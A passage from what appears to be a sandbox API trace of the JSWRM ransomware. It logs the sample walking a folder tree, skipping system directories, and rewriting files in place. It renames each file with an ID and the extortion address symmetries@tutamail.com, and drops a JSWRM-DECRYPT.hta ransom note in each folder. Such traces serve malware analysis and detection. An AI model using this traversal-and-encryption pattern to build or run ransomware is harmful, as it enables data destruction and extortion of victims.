hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0059.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0059.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0059.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0059.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd4) returned 0x1fc808 [0059.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0059.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0059.738] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\1044\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1044\\eula.rtf"), lpNewFileName="C:\\588bce7c90097ed212\\1044\\eula.rtf.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\1044\\eula.rtf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0059.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0059.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0059.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c380 | out: hHeap=0x1e0000) returned 1 [0059.738] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a42cf1d, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1a42cf1d, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1a42cf1d, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0059.738] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0059.738] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0059.738] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0059.738] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0059.738] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0059.738] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0059.738] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0059.738] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0059.738] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0059.738] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0059.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0059.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0059.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0059.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241308, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0059.739] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0059.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0059.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0059.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0059.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241128, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0059.739] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0059.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ae0 [0059.739] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c538 | out: hHeap=0x1e0000) returned 1 [0059.739] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0059.739] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0059.739] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x135c0, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0059.739] lstrcmpiW (lpString1="LocalizedData.xml", lpString2=".") returned 1 [0059.739] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="..") returned 1 [0059.739] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="...") returned 1 [0059.739] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="windows") returned -1 [0059.739] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="recovery") returned -1 [0059.739] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="perflogs") returned -1 [0059.739] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="documents and settings") returned 1 [0059.739] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$RECYCLE.BIN") returned 1 [0059.739] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="system volume information") returned -1 [0059.739] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="msocache") returned -1 [0059.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0059.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0059.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0059.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x240fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedData.xml", lpUsedDefaultChar=0x0) returned 17 [0059.739] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0059.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0059.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0059.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0059.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x240ef8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedData.xml", lpUsedDefaultChar=0x0) returned 17 [0059.740] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0059.740] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233230 [0059.740] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ae0 | out: hHeap=0x1e0000) returned 1 [0059.740] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0059.740] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0059.740] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0059.740] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1044\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0059.740] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=79296) returned 1 [0059.740] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.740] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x135c0) returned 0x2471a8 [0059.740] ReadFile (in: hFile=0x3d4, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x135c0, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f2d4*=0x135c0, lpOverlapped=0x0) returned 1 [0059.746] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.747] WriteFile (in: hFile=0x3d4, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0x135c0, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f2d0*=0x135c0, lpOverlapped=0x0) returned 1 [0059.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0059.748] CloseHandle (hObject=0x3d4) returned 1 [0059.750] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2330f8 [0059.750] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0059.750] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0059.750] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d458, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0059.750] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0059.750] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0059.750] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0059.750] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0059.750] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0059.750] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0059.750] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x23a120 [0059.750] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217bf0 [0059.750] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a120 | out: hHeap=0x1e0000) returned 1 [0059.750] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0059.750] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217bf0 | out: hHeap=0x1e0000) returned 1 [0059.750] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0059.750] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1044\\localizeddata.xml"), lpNewFileName="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\1044\\localizeddata.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0059.751] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0059.751] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2330f8 | out: hHeap=0x1e0000) returned 1 [0059.751] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0059.751] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0059.751] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0059.751] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0059.751] lstrcmpiW (lpString1="SetupResources.dll", lpString2=".") returned 1 [0059.751] lstrcmpiW (lpString1="SetupResources.dll", lpString2="..") returned 1 [0059.751] lstrcmpiW (lpString1="SetupResources.dll", lpString2="...") returned 1 [0059.751] lstrcmpiW (lpString1="SetupResources.dll", lpString2="windows") returned -1 [0059.751] lstrcmpiW (lpString1="SetupResources.dll", lpString2="recovery") returned 1 [0059.751] lstrcmpiW (lpString1="SetupResources.dll", lpString2="perflogs") returned 1 [0059.751] lstrcmpiW (lpString1="SetupResources.dll", lpString2="documents and settings") returned 1 [0059.751] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$RECYCLE.BIN") returned 1 [0059.751] lstrcmpiW (lpString1="SetupResources.dll", lpString2="system volume information") returned -1 [0059.751] lstrcmpiW (lpString1="SetupResources.dll", lpString2="msocache") returned 1 [0059.751] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0059.751] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0059.751] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0059.751] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x241268, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetupResources.dll", lpUsedDefaultChar=0x0) returned 18 [0059.751] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0059.751] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0059.751] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0059.751] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0059.751] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x241330, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetupResources.dll", lpUsedDefaultChar=0x0) returned 18 [0059.751] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0059.751] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c18 [0059.751] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233230 | out: hHeap=0x1e0000) returned 1 [0059.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0059.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0059.752] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0059.752] FindClose (in: hFindFile=0x231c00 | out: hFindFile=0x231c00) returned 1 [0059.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c18 | out: hHeap=0x1e0000) returned 1 [0059.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0059.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0059.752] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="1045", cAlternateFileName="")) returned 1 [0059.752] lstrcmpiW (lpString1="1045", lpString2=".") returned 1 [0059.752] lstrcmpiW (lpString1="1045", lpString2="..") returned 1 [0059.752] lstrcmpiW (lpString1="1045", lpString2="...") returned 1 [0059.752] lstrcmpiW (lpString1="1045", lpString2="windows") returned -1 [0059.752] lstrcmpiW (lpString1="1045", lpString2="recovery") returned -1 [0059.752] lstrcmpiW (lpString1="1045", lpString2="perflogs") returned -1 [0059.752] lstrcmpiW (lpString1="1045", lpString2="documents and settings") returned -1 [0059.752] lstrcmpiW (lpString1="1045", lpString2="$RECYCLE.BIN") returned 1 [0059.752] lstrcmpiW (lpString1="1045", lpString2="system volume information") returned -1 [0059.752] lstrcmpiW (lpString1="1045", lpString2="msocache") returned -1 [0059.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0059.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0059.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0059.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0059.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x2268b0 [0059.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0059.752] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1045\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\1045\\jswrm-decrypt.hta")) returned 0xffffffff [0059.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2268b0 | out: hHeap=0x1e0000) returned 1 [0059.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0059.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0059.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0059.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0059.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0059.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0059.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0059.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c170 [0059.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x2260b0 [0059.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c170 | out: hHeap=0x1e0000) returned 1 [0059.754] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1045\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\1045\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0059.756] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.756] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0059.757] CloseHandle (hObject=0x450) returned 1 [0059.757] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2260b0 | out: hHeap=0x1e0000) returned 1 [0059.757] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0059.757] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0059.757] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0059.757] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0059.757] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0059.757] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0059.757] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x2260b0 [0059.757] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0059.757] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1045\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\1045\\jswrm-decrypt.hta")) returned 0x20 [0059.757] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2260b0 | out: hHeap=0x1e0000) returned 1 [0059.757] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0059.757] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0059.757] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1045\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf38014a5, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x1a479436, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName=".", cAlternateFileName="")) returned 0x231f80 [0059.758] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0059.758] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf38014a5, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x1a479436, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="..", cAlternateFileName="")) returned 1 [0059.758] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0059.758] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0059.758] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xfc8, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0059.758] lstrcmpiW (lpString1="eula.rtf", lpString2=".") returned 1 [0059.758] lstrcmpiW (lpString1="eula.rtf", lpString2="..") returned 1 [0059.758] lstrcmpiW (lpString1="eula.rtf", lpString2="...") returned 